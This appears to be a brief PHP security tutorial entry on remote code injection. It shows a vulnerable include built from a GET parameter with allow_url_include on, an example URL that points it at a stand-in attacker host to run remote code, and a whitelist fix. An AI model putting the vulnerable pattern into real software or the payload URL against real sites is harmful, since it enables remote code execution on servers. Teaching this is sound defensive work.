Remote code injection
A remote code injection attack occurs when an attacker to execute PHP code.
ini_set("allow_url_include", 1);
include "{$_GET['section']}/data.inc.php";
// http://example.org/?section=evil.example.org/attack.php
// include "http://evil.example.org/attack.php?data.inc.php"; // Look Here
Protection
Filter all input and never use tainted data in an include or require.
ini_set("allow_url_include", 1);
$sections = array('home', 'news', 'photos', 'blog');
$section = in_array($_GET['section'], $sections) ? $_GET['section'] : 'home';
include "$section/data.inc.php";
Last update: 504 days ago
